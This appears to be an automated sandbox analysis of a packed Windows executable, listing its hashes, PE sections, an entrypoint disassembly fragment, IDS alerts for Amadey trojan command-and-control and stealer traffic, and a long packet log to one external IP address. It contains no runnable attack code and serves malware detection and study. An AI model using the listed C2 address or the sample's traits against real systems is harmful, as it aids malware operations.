                                                                                            SHA512:babf970ee423976f68864c67d9ec7a0771be65465b4ea3c498fd9a9ab98f08124be2a0ec16f7952b237d27d778ef49ef9f48fe8ad66dd9a3f840ffc9a5658a40
                                                                                            SSDEEP:49152:rOixuZfOJofYPg+EevCu7OgYZkwtOc/Xe+vv:rOgIfOJosF/jYZk/cv
                                                                                            TLSH:AE9533484EE09BB8CB6DD473FC9B921178FC20BD84435D71BA4DB5C19213B98CB69BA1
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@...............

                                                                                            File Icon

                                                                                            Icon Hash:90cececece8e8eb0

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x8b2000
                                                                                            Entrypoint Section:.taggant
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x65BFB289 [Sun Feb 4 15:51:37 2024 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:6
                                                                                            OS Version Minor:0
                                                                                            File Version Major:6
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:6
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            jmp 00007FED7473C45Ah
                                                                                            psadbw mm3, qword ptr [eax+eax]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            jmp 00007FED7473E455h
                                                                                            add byte ptr [esi], al
                                                                                            or al, byte ptr [eax]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], dh
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [esi], al
                                                                                            or al, byte ptr [eax]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [ecx], al
                                                                                            add byte ptr [eax], 00000000h
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            adc byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            pop es
                                                                                            or al, byte ptr [eax]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x670560x6a.idata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x4d8.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4afe2c0x10qrqrzugw
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x4afddc0x18qrqrzugw
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            0x10000x650000x2d600e4827732dfed828f66c8421847366160False0.9976810003443526data7.985573734729088IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x660000x4d80x4002f19bf23246247d6b4df51953cc3f865False0.5869140625data4.967303011972349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .idata 0x670000x10000x2003e006a9335e338058eeedc928303ef15False0.1484375data1.0173294605253855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            0x680000x2a80000x2007a442fb22272fbe3a546a3274759cb7eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            qrqrzugw0x3100000x1a10000x1a04003aea93df949a18d850bc6060f9db06a3False0.9941617398648649data7.952553763382188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            ajeqznom0x4b10000x10000x40095bcb38ddcc8b8bea56164234fa9698eFalse0.7802734375data6.110668361890099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .taggant0x4b20000x30000x2200ba38699bf57e98ef003122eefc5a5a63False0.05813419117647059DOS executable (COM)0.7122951789617492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_MANIFEST0x4afe3c0x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397
                                                                                            RT_MANIFEST0x4b01220x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                            Imports

                                                                                            DLLImport
                                                                                            kernel32.dlllstrcpy

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Snort IDS Alerts

                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                            03/28/24-20:03:03.166034TCP2856147ETPRO TROJAN Amadey CnC Activity M34973780192.168.2.4185.215.113.32
                                                                                            03/28/24-20:03:07.459174TCP2856151ETPRO TROJAN Amadey CnC Activity M74974580192.168.2.4185.215.113.32
                                                                                            03/28/24-20:03:06.745507TCP2855239ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST)4974380192.168.2.4185.215.113.32

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Mar 28, 2024 20:03:02.918956995 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:02.919059992 CET4973780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.165461063 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.165477991 CET8049737185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.165752888 CET4973780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.165754080 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.166033983 CET4973780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.166183949 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.413186073 CET8049737185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.413250923 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414588928 CET8049737185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414609909 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414633036 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414654970 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414658070 CET4973780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.414701939 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.414727926 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414743900 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414757967 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414774895 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.414774895 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.414827108 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414833069 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.414833069 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.414840937 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414877892 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.414879084 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414900064 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.414901972 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.414927959 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.414948940 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.416089058 CET4973780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.660882950 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.660979986 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.660979986 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.660995960 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661025047 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661034107 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661045074 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661048889 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661072969 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661088943 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661092043 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661133051 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661154985 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661168098 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661190987 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661207914 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661243916 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661262035 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661276102 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661283970 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661290884 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661307096 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661319017 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661338091 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661384106 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661468983 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661506891 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661521912 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661529064 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661545038 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661545992 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661576033 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661593914 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661601067 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661617041 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661642075 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661647081 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.661659002 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661689043 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.661911011 CET8049737185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.667124033 CET8049737185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.667246103 CET4973780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.781825066 CET4973780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.782279968 CET4973880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.906982899 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907011032 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907026052 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907077074 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907110929 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907182932 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907224894 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907234907 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907278061 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907294989 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907310009 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907335997 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907341003 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907365084 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907366991 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907393932 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907408953 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907434940 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907455921 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907469988 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907478094 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907497883 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907499075 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907520056 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907540083 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907604933 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907624960 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907649994 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907669067 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907691002 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907737017 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907768011 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907782078 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907793045 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907808065 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907814980 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907838106 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907845020 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907874107 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907883883 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.907906055 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907923937 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.907980919 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908020973 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908023119 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908066988 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908067942 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908096075 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908113956 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908135891 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908140898 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908178091 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908195019 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908241034 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908251047 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908262968 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908276081 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908298969 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908303976 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908329964 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908334017 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908348083 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908358097 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908375025 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908376932 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908399105 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908401012 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908415079 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908415079 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908437967 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908452034 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908462048 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908493996 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908523083 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908536911 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:03.908565998 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:03.908585072 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.027259111 CET8049738185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.027393103 CET4973880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.027621984 CET4973880192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.027932882 CET8049737185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.028006077 CET4973780192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.153266907 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.153326035 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.153335094 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.153378010 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.153428078 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.153470993 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.153472900 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.153511047 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.153542042 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.153575897 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.153580904 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.153614044 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.153639078 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.153681993 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.153743029 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.153781891 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.153786898 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.153825045 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.153830051 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.153871059 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.153980970 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.154027939 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.154086113 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.154131889 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.154243946 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.154278040 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.154287100 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.154319048 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.154381037 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.154424906 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.154454947 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.154496908 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.154548883 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.154593945 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.154597044 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.154638052 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.154707909 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.154755116 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.154823065 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.154870033 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.154915094 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.154959917 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.154998064 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.155045033 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.155062914 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.155096054 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.155122042 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.155139923 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.155143023 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.155159950 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.155200005 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.155200005 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.155211926 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.155240059 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.155261993 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.155273914 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.155297995 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.155324936 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.155340910 CET4973680192.168.2.4185.215.113.32
                                                                                            Mar 28, 2024 20:03:04.155364037 CET8049736185.215.113.32192.168.2.4
                                                                                            Mar 28, 2024 20:03:04.155364037 CET4973680192.168.2.4185.215.113.32
